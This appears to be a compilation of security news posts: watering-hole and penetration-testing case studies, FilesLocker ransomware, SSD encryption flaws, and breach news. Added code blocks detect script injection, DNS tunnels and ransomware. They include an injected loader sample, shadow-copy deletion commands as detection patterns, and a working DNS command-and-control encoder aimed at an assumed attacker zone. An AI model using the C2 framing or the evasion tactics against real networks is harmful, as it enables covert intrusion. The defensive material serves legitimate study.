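    """Host a script src loads from; relative URLs resolve to the page host."""
    return (urlsplit(src).netloc or page_host).lower()


def find_injections(html, page_host, allowed_hosts, known_inline_hashes):
    """Return ("external", src) for scripts from hosts outside the allowlist
    and ("inline", sha256) for inline scripts not in the known-good set."""
    collector = _ScriptCollector()
    collector.feed(html)
    collector.close()
    findings = []
    for src in collector.external:
        if script_host(src, page_host) not in allowed_hosts:
            findings.append(("external", src))
    for body in collector.inline:
        digest = hashlib.sha256(body.encode()).hexdigest()
        if digest not in known_inline_hashes:
            findings.append(("inline", digest))
    return findings


# Constructed sample: one first-party script and one expected inline snippet,
# plus an injected loader and an injected inline stage in watering-hole style.
PAGE_HOST = "news.example.org"
ALLOWED_HOSTS = {"news.example.org", "static.example.org"}
KNOWN_INLINE = {hashlib.sha256(b"var site='news';").hexdigest()}
SAMPLE_HTML = """<html><head>
<script src="/js/app.js"></script>
<script>var site='news';</script>
<script src="//cdn.example-tracker.net/st.js"></script>
<script>(function(){var s=document.createElement('script');
s.src='https://stage.example-tracker.net/f.js';document.head.appendChild(s);})();</script>
</head><body>...</body></html>"""

if __name__ == "__main__":
    for kind, detail in find_injections(SAMPLE_HTML, PAGE_HOST, ALLOWED_HOSTS, KNOWN_INLINE):
        print(kind, detail)
```

Run a check like this against the live site from outside the network, because an attacker who can modify templates on the server can also hide the injection from checks that run there. Subresource Integrity and a Content Security Policy that restricts script sources give the visitor's browser the same check at load time.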

How To Strike A Better Threat Management Balance

Compared with more obvious tactics, such as phishing emails with malicious links or ransomware attachments, a watering hole campaign can easily fly under the radar of organizations that haven’t experienced a website compromise before. For that reason, many companies affected by the likes of OceanLotus find themselves responding reactively rather than proactively addressing the associated risks ahead of time.

IBM experts suggest adopting a threat management framework that begins with generating insights about potential attacks, implementing safeguards necessary to prevent them, monitoring continuously to detect anomalies and responding as necessary.

Source: WeLiveSecurity

The post OceanLotus Watering Hole Campaign Compromises 21 High-Profile Southeast Asian Websites appeared first on Security Intelligence.

Phish or Fox? A Penetration Testing Case Study From IBM X-Force Red

As you may know, IBM X-Force Red is IBM Security’s penetration testing team. The team features professional, world-class testers who help organizations find and manage their security vulnerabilities on any and all platforms, including software and hardware devices. Our motto is “hack anything to protect everything.”

This post features a case study from IBM X-Force Red that shows how we ran into trouble on a black-box penetration testing assignment, worked against a well-prepared blue team, and overcame the obstacles to ultimately establish a solid adversarial operation. Let’s take a closer look at what we did to get through security and, more importantly, what your team can do to better secure your organization in an ever-evolving adversarial landscape.

A Tale of an Undeliverable Payload

On one of our red team’s recent engagements with a customer’s blue team, we were tasked with delivering a malicious payload to network users without setting off security controls or alerting the defensive team.

As a first attempt, we sent a phishing email to feel out the level of awareness on the other side. The email message was rigged with our malicious payload, for which we selected the attachment type and a lure that would appear credible. However, the blue team on the other side must have been lying in wait for suspicious activity. Every one of our emails was delivered, but our payloads were not. The payloads did not call home to the control server we had set up, and we started getting visits from the defensive team in the form of an anti-malware sandbox.

Within minutes, additional sandboxes hit on our command and control (C&C) server’s handler, and soon more than 12 security vendor clouds were feasting on the payload. We understood at that point that our payload had been detected, analyzed and widely shared by the blue team, but since this was a black-box operation, we had little way of knowing what went wrong after sending out our rigged emails.

If the Phish Fails, Send in the Fox

Going back to the drawing board, we realized that we must have triggered the blue team’s dynamic malware detection systems and controls. We had to find a new way to deliver the payload in a more concealed manner — preferably encrypted — and to have it detonate only when it reached its final destination to prevent premature discovery.

To do so, we had to overcome some hurdles, including:

  • Sidestepping traffic inspection controls;
  • Opening a siloed channel to send information from outside into the organizational networks;
  • Decreasing repeatable sampling of our externally hosted content;
  • Minimizing the chance of attribution at the initial visit/download/delivery stages; and
  • Bypassing URL inspections.

Some creative thinking summoned a good candidate to help us overcome most controls, mostly because it is a legitimate service that people use in daily interactions: Mozilla’s Firefox Send (FFSend).

Before we continue to describe the use of FFSend, we would like to note here that it is a legitimate tool that can be used safely, and that it was not compromised. We also disclosed information in this blog to Mozilla ahead of its publication and received the company’s support.

The Right Fox for the Job

FFSend is a legitimate file transfer tool from Mozilla. It has several interesting features that make it a great tool for users, and when files are sent through, its developers indicate it will generate “a safe, private and encrypted link that automatically expires to ensure your stuff does not remain online forever.” This makes FFSend a useful way to send private files between people in a secure manner.

To send a file, the sender, accessing FFSend via a browser, uploads the file he or she wants to share with the recipient through a simple web interface. He or she receives a URL for a shared link and can send it to the recipient. The recipient visits the shared link and downloads the file, at which point the FFSend service “forgets” the link and removes shared content from the server.

Figure 1: Basic flow of events using FFSend

From our red team’s perspective, FFSend was a good fit for sending encrypted files. Let’s see how it answered some of the needs we defined.

FFSend allows files of up to 1 GB, which is enough both to deliver a payload and to exfiltrate data. This answered our need for a siloed, covert channel into the organization. FFSend encrypts and decrypts the file with AES-GCM directly in the browser, and the key travels in the fragment of the shared URL, which browsers never send to the server, so we would not have to deal with key generation or distribution ourselves. Because only ciphertext crosses the wire, the payload evades inspection even by intercepting proxies that unwrap Transport Layer Security (TLS), and no party along the way, including Mozilla, can read it.

Figure 2: Schematic view of FFSend’s automated encryption

Since the Firefox Send domain is trusted by most organizational controls, we gain yet another advantage by using FFSend. We do not have to labor over a fake site that might raise suspicion, and we can still get our file's link across to the recipient. The trusted Firefox domain is also more likely to slip through URL inspection and anti-phishing controls, as well as the blacklists organizations deploy to catch malicious content coming from rogue resources.

Figure 3: FFSend is considered a trusted source

As for reducing repeated sampling of the payload, we get that as well by setting a strict one-time-only limit on the number of times our FFSend link can be accessed after it’s generated, avoiding the sandbox attempts and threat sharing. Moreover, FFSend automatically expires links after 24 hours, which effectively makes the path to our payload self-destruct if the target has not opened it. Self-destruction is also featured on FFSend’s application program interface (API), so it can also be ordered ad hoc after a link is sent but before its default expiration.

Figure 4: FFSend’s link expiration and self-destruct schema

Avoiding attribution is also easier when using a legitimate service that implements ephemeral storage of the files it delivers. Using such a service allowed us to avoid any links back to our testers, since there was no account required to send a file, nor was information on the owner of the encrypted data sent, required or kept.

This meant our ownership of the malicious file would be anonymous, though there would still be a tie to our originating IP address and browser fingerprints. With most information concealed, we deemed this level of anonymity good enough for the desired outcome.

Figure 5: No sender identity required, no attribution links back to red team

Setting Up a Communications Channel

With the file-sending issue resolved, we still needed a covert communication channel to help us run an ongoing operation without being exposed by the blue team.

To set up a communications channel, we did not wish to start from scratch. We decided to use FFSend to make it work as the siloed, covert channel we needed. That was one problem solved, but to coordinate the sending and receiving of data over that channel, we would also need a side channel of communications to avoid inspection and detection.

Communication gets inspected by a number of security controls, so it is essential that we blend in with the environment. To do that, we had to choose a protocol that would let us look like everyone else on the network. Looking at the typical choices, Hypertext Transfer Protocol Secure (HTTPS), Internet Control Message Protocol (ICMP) and the Domain Name System (DNS), we selected DNS for its decent packet capacity and overall better chance of blending in with legitimate user traffic.

DNS gave us the side channel we needed alongside FFSend: tasking, and the links to FFSend-hosted data, travel in DNS queries and responses, while bulk data moves through FFSend. To keep things consistent, DNS record content is encrypted with the same shared key used for the FFSend data link.

In our command protocol, we can accommodate short instructions and differentiate between the types of requests we want to task agents with, whether to run something or to return a response. For example, we can encode instructions such as fetch me <file> or execute <command>. The agent then carries out the request and posts the results over our FFSend data channel.

On the wire, the command channel looks like well-formed dynamic DNS traffic and is separate from the HTTPS channel used for data. This split makes it much harder for automated controls to correlate the two streams.
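To make the split-channel design above concrete, here is an added example that is not the Foxtrot code or anything from X-Force Red: it shows how a short tasking such as fetch <file> is encrypted under a shared key, encoded into well-formed DNS query names that respect the 63-byte label and 253-byte name limits, chunked with sequence numbers, and reassembled by the other side in any order. The zone c2.example.net, the session label and the key are assumptions. The cipher is a stdlib-only encrypt-then-MAC construction (an HMAC-SHA256 keystream plus an HMAC tag) standing in for the AES-GCM the post describes, so the block runs without third-party packages; anything beyond a demonstration should use a real AEAD.

```python
"""Split-channel framing: tasking over DNS, bulk data over an HTTPS file service.

Added example, not the X-Force Red Foxtrot code. Carries a command in
query names of the form <seq>-<total>.<data labels>.<session>.<zone>.
The zone, session label and key are assumptions; the cipher is an
encrypt-then-MAC stand-in for AES-GCM built from the standard library.
"""
import base64
import hashlib
import hmac
import os

ZONE = "c2.example.net"   # assumed attacker-controlled zone
MAX_LABEL = 63            # RFC 1035 limit per label
MAX_NAME = 253            # practical limit for a full name
HEAD_LEN = len("0000-0000.")


def _subkeys(key):
    return hashlib.sha256(b"enc" + key).digest(), hashlib.sha256(b"mac" + key).digest()


def _keystream(enc_key, nonce, n):
    blocks = (hmac.new(enc_key, nonce + i.to_bytes(4, "big"), hashlib.sha256).digest()
              for i in range((n + 31) // 32))
    return b"".join(blocks)[:n]


def seal(key, plaintext, nonce=None):
    """Return nonce(12) || ciphertext || tag(16)."""
    enc_key, mac_key = _subkeys(key)
    nonce = nonce or os.urandom(12)
    ct = bytes(a ^ b for a, b in zip(plaintext, _keystream(enc_key, nonce, len(plaintext))))
    tag = hmac.new(mac_key, nonce + ct, hashlib.sha256).digest()[:16]
    return nonce + ct + tag


def unseal(key, blob):
    """Verify the tag before decrypting; raise on any tampering."""
    enc_key, mac_key = _subkeys(key)
    nonce, ct, tag = blob[:12], blob[12:-16], blob[-16:]
    expect = hmac.new(mac_key, nonce + ct, hashlib.sha256).digest()[:16]
    if not hmac.compare_digest(tag, expect):
        raise ValueError("authentication failed")
    return bytes(a ^ b for a, b in zip(ct, _keystream(enc_key, nonce, len(ct))))


def encode_command(key, session, command):
    """Encrypt a command and split it into DNS query names."""
    text = base64.b32encode(seal(key, command.encode())).decode().rstrip("=").lower()
    suffix = f".{session}.{ZONE}"
    labels_per_query = (MAX_NAME - HEAD_LEN - len(suffix)) // (MAX_LABEL + 1)
    chunk = labels_per_query * MAX_LABEL
    pieces = [text[i:i + chunk] for i in range(0, len(text), chunk)]
    names = []
    for seq, piece in enumerate(pieces):
        labels = [piece[i:i + MAX_LABEL] for i in range(0, len(piece), MAX_LABEL)]
        names.append(f"{seq:04d}-{len(pieces):04d}." + ".".join(labels) + suffix)
    return names


def decode_queries(key, names):
    """Reassemble the query names (any order) and decrypt the command."""
    n_suffix = len(ZONE.split(".")) + 1       # session label plus zone labels
    parts, total = {}, 0
    for name in names:
        head, rest = name.split(".", 1)
        seq, total = (int(x) for x in head.split("-"))
        parts[seq] = "".join(rest.split(".")[:-n_suffix])
    if len(parts) != total:
        raise ValueError("incomplete command")
    text = "".join(parts[i] for i in range(total)).upper()
    blob = base64.b32decode(text + "=" * (-len(text) % 8))
    return unseal(key, blob).decode()


KEY = hashlib.sha256(b"ffsend-shared-secret-demo").digest()   # assumed shared key

if __name__ == "__main__":
    queries = encode_command(KEY, "a1b2", "fetch /etc/hosts")
    for q in queries:
        print(len(q), q)
    print(decode_queries(KEY, queries))
```

The 16-byte command fits in a single query; a 300-byte one spreads across three. Every query is syntactically ordinary DNS, which is why the post later recommends behavioural detection over pattern matching.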

The Foxtrot Control Server Rises

Once we knew how to set up our covert communications, we set up a rogue control server and named it Foxtrot. Foxtrot was a mechanism we used to facilitate communication between any number of the remote agents.

Having created Foxtrot with a modified FFSend service and a DNS side channel, IBM X-Force Red testers were able to push the initial payload to unsuspecting recipients. The payload circumvented dynamic defenses, helped our red team gain a foothold in the environment and established persistence to freely move data across intercepting proxies. We were also able to execute commands on compromised hosts, even when the defensive team had its security controls and monitoring turned on.

A Word to the Wise Defender

Red teams have the advantage of only needing to find one way in, while blue teams are tasked with securing all ways in and out. This one-sided advantage means that defenders have to keep a close eye on attack tactics, techniques and procedures (TTPs) and expect encryption and covert side channels to challenge existing automated controls.

After having achieved our goals, we came away with some tips for defenders that can help security teams prepare for the TTPs we used.

  • Expect to see the use of client-side encryption gain more prominence in adversarial workflows, and choose security controls accordingly.
  • Expect to see split-data and command channels grow in popularity among attackers, because this technique can help break automated analysis patterns employed by traditional security tools. Defenders should look into behavioral, heuristics-based detection, augmented by a fully staffed security operations center (SOC) to continuously detect split-channel operations.
  • X-Force Red encourages defensive teams to test their incident response (IR) processes against simulated attacker workflows that employ custom tooling capabilities.
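The second tip above recommends behavioural detection of split channels. As an added example, not from the original post, the following scores resolver logs for the footprint a DNS command channel leaves: many distinct, long, high-entropy subdomains under one zone from one client in a short time. The log lines, their format (timestamp, client, query name, query type) and the thresholds are constructed and assumed; a real deployment would extract the registered domain with the public suffix list rather than the last two labels, and tune the thresholds against baseline traffic.

```python
"""Spotting a DNS side channel in resolver logs.

Added example, not from the original post. Scores each (client, zone) pair
by the number of distinct long, high-entropy subdomains it queried. Log
lines, their format and the thresholds are constructed and assumed.
"""
import math
from collections import defaultdict

# Constructed resolver log: "<timestamp> <client> <query name> <type>".
SAMPLE_LOG = """2018-11-05T09:12:01 10.0.0.7 www.example.com A
2018-11-05T09:12:02 10.0.0.7 cdn.example.com A
2018-11-05T09:12:03 10.0.0.7 0000-0002.mfrggzdfmztwq2lknnwg23tpobyxe43uoqqhi.a1b2.c2.example.net A
2018-11-05T09:12:03 10.0.0.7 0001-0002.gezdgnbvgy3tqojqgezdgnbvgy3tqojq.a1b2.c2.example.net A
2018-11-05T09:12:04 10.0.0.7 mail.example.com MX
2018-11-05T09:12:05 10.0.0.7 0000-0001.kbswy3dpfqqhg33sfyqhi.a1b2.c2.example.net TXT
2018-11-05T09:12:06 10.0.0.9 www.example.com A
"""


def shannon_entropy(s):
    """Bits per character; encoded data sits well above natural hostnames."""
    if not s:
        return 0.0
    n = len(s)
    counts = {}
    for ch in s:
        counts[ch] = counts.get(ch, 0) + 1
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def split_name(qname, zone_labels=2):
    """(subdomain, zone) using the last `zone_labels` labels as the zone.
    A production version would use the public suffix list instead."""
    labels = qname.rstrip(".").split(".")
    return ".".join(labels[:-zone_labels]), ".".join(labels[-zone_labels:])


def parse_log(text):
    for line in text.splitlines():
        ts, client, qname, qtype = line.split()
        yield ts, client, qname.lower(), qtype


def score_zones(text, min_sub_len=30, min_entropy=3.5):
    """{(client, zone): number of distinct data-like subdomains}."""
    seen = defaultdict(set)
    for _, client, qname, _ in parse_log(text):
        sub, zone = split_name(qname)
        if len(sub) >= min_sub_len and shannon_entropy(sub.replace(".", "")) >= min_entropy:
            seen[(client, zone)].add(sub)
    return {key: len(subs) for key, subs in seen.items()}


def alerts(text, min_distinct=2, **thresholds):
    """(client, zone) pairs with enough distinct data-like queries to report."""
    return sorted(key for key, n in score_zones(text, **thresholds).items() if n >= min_distinct)


if __name__ == "__main__":
    for client, zone in alerts(SAMPLE_LOG):
        print(f"possible DNS channel: {client} -> {zone}")
```

The sample contains three encoded queries from one client under one zone, surrounded by ordinary lookups; only that client-and-zone pair is reported. Correlating this burst with the HTTPS side (a trusted file-sharing domain being hit shortly afterwards) is what detection across the split has to achieve.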

What can teams do right now to get ahead of determined threat actors? Step up your security with pre-emptive action in the shape of professional penetration testing, and make sure the scope of the testing gradually covers both hardware and software. You should also consider adopting cognitive solutions to augment analysts’ capabilities and scale up as attacks grow more frequent and complex.

The post Phish or Fox? A Penetration Testing Case Study From IBM X-Force Red appeared first on Security Intelligence.

Privacy laws do not understand human error

In a world of increasingly punitive regulations like GDPR, the combination of unstructured data and human error represents one of the greatest risks an organization faces. Understanding the differences between unstructured and structured data, and the different approaches needed to secure each, is critical to achieving compliance with the many data privacy regulations that businesses in the U.S. now face. Structured data consists of individual elements of information organized to be accessible, … More

The post Privacy laws do not understand human error appeared first on Help Net Security.

Safari Tests ‘Not Secure’ Warning For Unencrypted Websites

Similar to Chrome, Apple's Safari browser is testing a warning system for when users visit websites that aren't protected by HTTPS encryption. "The feature for now is only in Safari Technology Preview 70, a version of the web browser Apple uses to test technology it typically brings to the ordinary version of Safari," reports CNET. From the report: Apple didn't immediately respond to a request for comment on its plans for bringing the warning to mainstream Safari. Apple's browser does warn you already if you have an insecure connection to a very sensitive website for typing in passwords or credit card numbers.

Read more of this story at Slashdot.

Ransomware-as-a-Service Program Offers Affiliates Up to 75 Percent of Revenue to Spread Infection

A ransomware-as-a-service program called FilesLocker is offering affiliates commissions of up to 75 percent on all revenue stolen from victims if they can drive enough traffic.

Details about FilesLocker were first posted on Twitter, but a subsequent investigation traced it to a Chinese-language cybercrime forum hosted on Tor, the anonymity network. Written in C# and available in both Chinese and English, the features promoted on the forum include strong encryption, the ability to clear shadow volume copies and customization options.

While FilesLocker is relatively unsophisticated in design, according to security researchers, it encrypts victims' files with a per-victim key that is itself encrypted with a public key embedded in the malware, so only the operator holding the matching private key can recover the files. The ransomware scans common user folders such as Documents and Pictures, appends a .locked extension to each encrypted file, and then displays a note demanding 0.18 bitcoin, to be arranged through a specific email address, along with an automatically generated victim ID for tracking purposes.

How Affiliates Qualify For FilesLocker Spoils

The developer behind FilesLocker stipulated that interested affiliates should have a proven track record in distributing ransomware through phishing or other methods, with a minimum of 10 infections a day. The developer also warned affiliates against uploading the program to online multi-engine malware scanners, which share submitted samples with antivirus vendors and would burn the build. While those who do particularly well can earn three-quarters of what's gathered from victims, the program's base revenue share is 60 percent.

The practice of spreading ransomware through affiliates is becoming more common among cybercriminals. Back in August, for example, cybercriminals pitched a similar ransomware-as-a-service threat dubbed Princess Evolution to potential partners for the same 60 percent revenue share.

Containing Threats Like FilesLocker

While it’s common and natural to panic upon seeing a ransom note pop up on the screen, security leaders should train users to report such incidents as quickly as possible so they can minimize the potential spread of ransomware-as-a-service programs.

IBM Security’s “Ransomware Response Guide” advised security professionals to immediately disconnect any machine infected with ransomware from the corporate network, as well as any access to Wi-Fi or other services that could link back to the attacker.

Isolating a system can give the security team enough time to conduct a proper root cause analysis (RCA) to identify how the ransomware is being distributed, which may mean closing off email or other communication channels for at-risk employees. Since malware developers are starting to work as a team, their potential victims need to do the same.
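Reporting and isolation, as described above, depend on someone noticing the infection early. As an added example, not from the original article or IBM's guide, the following scans endpoint telemetry for the two behaviours the FilesLocker write-up names: deletion of shadow volume copies and a burst of files renamed with a new extension such as .locked. The event lines, their format (timestamp, host, event type, details) and the thresholds are constructed and assumed.

```python
"""Early ransomware indicators from endpoint telemetry.

Added example, not from the original article or IBM's response guide. Scans
process-creation and file-rename events for shadow-copy deletion and for a
burst of files renamed with an appended extension. Event lines, their
format and the thresholds are constructed and assumed.
"""
import re
from collections import defaultdict

# Constructed events: '<timestamp> <host> PROC <image> "<command line>"' or
# '<timestamp> <host> RENAME <old path> <new path>' (paths without spaces).
SAMPLE_EVENTS = r"""2018-10-30T14:01:50 host7 PROC WINWORD.EXE "WINWORD.EXE /n"
2018-10-30T14:02:11 host7 PROC cmd.exe "vssadmin delete shadows /all /quiet"
2018-10-30T14:02:11 host7 PROC cmd.exe "wmic shadowcopy delete"
2018-10-30T14:02:12 host7 RENAME C:\Users\a\Documents\q1.docx C:\Users\a\Documents\q1.docx.locked
2018-10-30T14:02:12 host7 RENAME C:\Users\a\Documents\q2.xlsx C:\Users\a\Documents\q2.xlsx.locked
2018-10-30T14:02:13 host7 RENAME C:\Users\a\Pictures\p1.jpg C:\Users\a\Pictures\p1.jpg.locked
2018-10-30T14:02:13 host7 RENAME C:\Users\a\Pictures\p2.jpg C:\Users\a\Pictures\p2.jpg.locked
2018-10-30T14:02:14 host7 RENAME C:\Users\a\Desktop\notes.txt C:\Users\a\Desktop\notes.txt.locked
2018-10-30T14:05:00 host9 RENAME C:\Users\b\report.docx C:\Users\b\report.docx.bak
"""

# Command lines that remove or disable the recovery options ransomware
# wants gone before it encrypts.
SHADOW_PATTERNS = [
    re.compile(r"\bvssadmin(?:\.exe)?\b.*\bdelete\s+shadows", re.I),
    re.compile(r"\bwmic(?:\.exe)?\b.*\bshadowcopy\s+delete", re.I),
    re.compile(r"\bwbadmin(?:\.exe)?\b.*\bdelete\s+catalog", re.I),
    re.compile(r"\bbcdedit(?:\.exe)?\b.*\brecoveryenabled\s+no", re.I),
]
EVENT_RE = re.compile(r"^(\S+) (\S+) (PROC|RENAME) (.*)$")


def parse_events(text):
    """Yield (timestamp, host, kind, detail) where detail is
    (image, command line) for PROC and (old path, new path) for RENAME."""
    for line in text.splitlines():
        m = EVENT_RE.match(line)
        if not m:
            continue
        ts, host, kind, rest = m.groups()
        if kind == "PROC":
            image, _, cmdline = rest.partition(" ")
            yield ts, host, kind, (image, cmdline.strip('"'))
        else:
            old, new = rest.split(" ", 1)
            yield ts, host, kind, (old, new)


def find_shadow_deletion(events):
    """(timestamp, host, command line) for every recovery-killing command."""
    return [(ts, host, detail[1]) for ts, host, kind, detail in events
            if kind == "PROC" and any(p.search(detail[1]) for p in SHADOW_PATTERNS)]


def find_rename_bursts(events, threshold=5):
    """Hosts that renamed at least `threshold` distinct files to the same
    appended extension within one minute: ((host, minute, ext), count)."""
    buckets = defaultdict(set)
    for ts, host, kind, detail in events:
        if kind != "RENAME":
            continue
        old, new = detail
        if new.startswith(old + "."):
            buckets[(host, ts[:16], new[len(old):])].add(old)
    return sorted((key, len(files)) for key, files in buckets.items() if len(files) >= threshold)


def triage(text, threshold=5):
    events = list(parse_events(text))
    return {"shadow_deletion": find_shadow_deletion(events),
            "rename_bursts": find_rename_bursts(events, threshold)}


if __name__ == "__main__":
    for kind, hits in triage(SAMPLE_EVENTS).items():
        print(kind, hits)
```

Shadow-copy deletion is a near-certain indicator and on its own justifies isolating the host; the rename burst catches families that skip that step. Both fire within seconds of the first encrypted file, well before a user reads the ransom note.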

Sources: BleepingComputer, Malware Hunter, Virus Total

The post Ransomware-as-a-Service Program Offers Affiliates Up to 75 Percent of Revenue to Spread Infection appeared first on Security Intelligence.

Researchers crack disk encryption in popular Samsung and Crucial SSDs

Researchers at Radboud University in the Netherlands have discovered grave security flaws in several popular solid-state drives (SSDs) that promise full disk encryption. In a nutshell, they can be cracked.

Self-encrypting drives are generally regarded as safe to use, and they can be; the models the researchers examined and found wanting are listed below:

  • Crucial (Micron) MX100, MX200 and MX300 internal SSDs
  • Samsung T3 and T5 USB external SSDs
  • Samsung 840 EVO and 850 EVO internal SSDs

The Radboud researchers found that Windows BitLocker trusts the built-in hardware encryption in these drives a bit too much: when a drive advertises hardware encryption support, BitLocker defaults to it rather than to its own software encryption, so the protection is only as strong as the drive's firmware.

This in itself wouldn’t be much of a problem if the self-encryption mechanism baked in Crucial’s and Samsung’s hardware was bulletproof. But it isn’t.

In one drive, the researchers found that the master password responsible for decrypting the stored data was an empty string by default, which could easily be exploited. In another, they unlocked the drive by defeating its password validation checks: the password only gated access and was not bound to the key that actually encrypts the data, so bypassing the check was enough to get at the plaintext.

Even though the flaws were disclosed responsibly, in accordance with the ethics of the white hat community, the drive models listed above remain affected. The researchers believe many other drives that use similar encryption schemes may be affected, and recommend that users employ software encryption (or configure BitLocker to use its own software encryption rather than the drive's) until patches arrive. Samsung itself now makes the same recommendation. Crucial's parent company, Micron, promises to deliver a fix soon.

Researcher Bernard van Gastel said, “The affected manufacturers were informed six months ago, in line with common professional practices. The results are being made public today so that users of the affected SSDs can protect their data properly.”
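On Windows the practical question is whether BitLocker has delegated to the drive's own encryption. The command manage-bde -status reports an Encryption Method for each volume; "Hardware Encryption" there means the drive's firmware, not BitLocker, holds the keys. The following is an added example, not from the Radboud paper or from Microsoft: it parses that output and lists the volumes relying on hardware encryption. The sample output is constructed and its exact layout is an assumption; run the real command in an elevated prompt and feed its text to parse_status.

```python
"""Report BitLocker volumes that rely on the drive's hardware encryption.

Added example, not from the Radboud paper or Microsoft. Parses the text
printed by `manage-bde -status` on Windows; the sample output is
constructed and its exact layout is an assumption.
"""
import re

SAMPLE_STATUS = """BitLocker Drive Encryption: Configuration Tool version 10.0.17763
Copyright (C) 2013 Microsoft Corporation. All rights reserved.

Disk volumes that can be protected with
BitLocker Drive Encryption:
Volume C: [OSDisk]
[OS Volume]

    Size:                 476.00 GB
    BitLocker Version:    2.0
    Conversion Status:    Fully Encrypted
    Percentage Encrypted: 100.0%
    Encryption Method:    Hardware Encryption - 1.3.111.2.1619.0.1.2
    Protection Status:    Protection On
    Lock Status:          Unlocked
    Identification Field: Unknown
    Key Protectors:
        TPM
        Numerical Password

Volume D: [Data]
[Data Volume]

    Size:                 931.00 GB
    BitLocker Version:    2.0
    Conversion Status:    Fully Encrypted
    Percentage Encrypted: 100.0%
    Encryption Method:    XTS-AES 128
    Protection Status:    Protection On
    Lock Status:          Unlocked
    Identification Field: Unknown
    Key Protectors:
        Password
"""

VOLUME_RE = re.compile(r"^Volume ([A-Z]:)", re.M)
FIELD_RE = re.compile(r"^[ \t]*([A-Za-z ]+):[ \t]+(\S.*?)[ \t]*$", re.M)


def parse_status(text):
    """{drive letter: {field: value}} for every volume block in the output."""
    pieces = VOLUME_RE.split(text)[1:]          # [letter, body, letter, body, ...]
    return {letter: {k.strip(): v for k, v in FIELD_RE.findall(body)}
            for letter, body in zip(pieces[::2], pieces[1::2])}


def hardware_encrypted(volumes):
    """Drive letters whose protection rests on the SSD firmware, not BitLocker."""
    return sorted(letter for letter, fields in volumes.items()
                  if fields.get("Encryption Method", "").lower().startswith("hardware"))


def unprotected(volumes):
    """Drive letters where BitLocker is present but protection is off."""
    return sorted(letter for letter, fields in volumes.items()
                  if fields.get("Protection Status", "").lower() != "protection on")


if __name__ == "__main__":
    vols = parse_status(SAMPLE_STATUS)
    print("hardware-encrypted volumes:", hardware_encrypted(vols))
    print("volumes without protection:", unprotected(vols))
```

Volumes the check reports should be decrypted and re-encrypted with software encryption after the Group Policy setting that permits hardware-based encryption has been disabled; simply turning protection off and on again keeps the same method.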

OWASP Top 10 Security Risks – Part II

It is National Cyber Security Awareness Month and in order to bring awareness to what threatens the integrity of websites, we have started a series of posts on the OWASP top 10 security risks.

The OWASP Top 10 list consists of the ten most common application security risks:

  1. Injection
  2. Broken Authentication
  3. Sensitive data exposure
  4. XML External Entities (XXE)
  5. Broken Access control
  6. Security misconfigurations
  7. Cross-Site Scripting (XSS)
  8. Insecure Deserialization
  9. Using Components with known vulnerabilities
  10. Insufficient logging and monitoring

In our previous post, we explained the first two items on the OWASP Top 10 list: injection and broken authentication.

Continue reading OWASP Top 10 Security Risks – Part II at Sucuri Blog.

Application Development GDPR Compliance Guidance

Last week IBM developerWorks released a three-part guidance series I have written to help application developers build GDPR-compliant applications.

Developing GDPR Compliant Applications Guidance

The General Data Protection Regulation (GDPR) was created by the European Commission and Council to strengthen and unify Europe's data protection law, replacing the 1995 European Data Protection Directive. Although the GDPR is a European Union (EU) regulation, it applies to any organization outside of Europe that handles the personal data of EU citizens. This includes the development of applications that are intended to process the personal information of EU citizens. Therefore, organizations that provide web applications, mobile apps or traditional desktop applications that can directly or indirectly process EU citizens' personal data, or that allow EU citizens to sign in, are subject to the GDPR's privacy obligations. Organizations face the prospect of powerful sanctions should applications fail to comply with the GDPR.

Part 1: A Developer's Guide to the GDPR
Part 1 summarizes the GDPR and explains how the privacy regulation impacts and applies to developing and supporting applications that are intended to be used by European Union citizens.

Part 2: Application Privacy by Design
Part 2 provides guidance for developing applications that are compliant with the European Union’s General Data Protection Regulation. 

Part 3: Minimizing Application Privacy Risk
Part 3 provides practical application development techniques that can alleviate an application's privacy risk.

Weekly Cyber Risk Roundup: Payment Card Breaches, Encryption Debate, and Breach Notification Laws

This past week saw the announcement of several new payment card breaches, including a point-of-sale breach at Applebee’s restaurants that affected 167 locations across 15 states.

The malware, which was discovered on February 13, 2018, was “designed to capture payment card information and may have affected a limited number of purchases” made at Applebee’s locations owned by RMH Franchise Holdings, the company said in a statement.

News outlets reported many of the affected locations had their systems infected between early December 2017 and early January 2018. Applebee’s has close to 2,000 locations around the world and 167 of them were affected by the incident.

In addition to Applebee's, MenuDrive issued a breach notification to merchants saying that its desktop ordering site was injected with malware designed to capture payment card information. The incident impacted certain transactions from November 5, 2017 to November 28, 2017.

“We have learned that the malware was contained to ONLY the Desktop ordering site of the version that you are using and certain payment gateways,” the company wrote. “Thus, this incident was contained to a part of our system and did NOT impact the Mobile ordering site or any other MenuDrive versions.”

Finally, there is yet another breach notification related to Sabre Hospitality Solutions' SynXis Central Reservations System, this time affecting Preferred Hotels & Resorts. Sabre said that an unauthorized individual used compromised user credentials to view reservation information, including payment card information, for a subset of hotel reservations that Sabre processed on behalf of the company between June 2016 and November 2017.


Other trending cybercrime events from the week include:

  • Marijuana businesses targeted: MJ Freeway Business Solutions, which provides business management software to cannabis dispensaries, is notifying customers of unauthorized access to its systems that may have led to personal information being stolen. The Canadian medical marijuana delivery service JJ Meds said that it received an extortion threat demanding $1,000 in bitcoin in order to prevent a leak of customer information.
  • Healthcare breach notifications: The Kansas Department for Aging and Disability Services said that the personal information of 11,000 people was improperly emailed to local contractors by a now-fired employee. Front Range Dermatology Associates announced a breach related to a now-fired employee providing patient information to a former employee. Investigators said two Florida Hospital employees stole patient records, and local news reported that 9,000 individuals may have been impacted by the theft.
  • Notable data breaches: Ventiv Technology, which provides workers’ compensation claim management software solutions, is notifying customers of a compromise of employee email accounts that were hosted on Office365 and contained personal information. Catawba County services employees had their personal information compromised due to the payroll and human resources system being infected with malware. Flexible Benefit Service Corporation said that an employee email account was compromised and used to search for wire payment information. A flaw in Nike’s website allowed attackers to read server data and could have been leveraged to gain greater access to the company’s systems. A researcher claimed that airline Emirates is leaking customer data.
  • Other notable events: Cary E. Williams CPA is notifying employees, shareholders, trustees and partners of a ransomware attack that led to unauthorized access to its systems. The cryptocurrency exchange Binance said that its users were the target of “a large scale phishing and stealing attempt” and those compromised accounts were used to perform abnormal trading activity over a short period of time. The spyware company Retina-X Studios said that it “is immediately and indefinitely halting its PhoneSheriff, TeenShield, SniperSpy and Mobile Spy products” after being “the victim of sophisticated and repeated illegal hackings.”

SurfWatch Labs collected data on many different companies tied to cybercrime over the past week. Some of the top trending targets are shown in the chart below.


Cyber Risk Trends From the Past Week


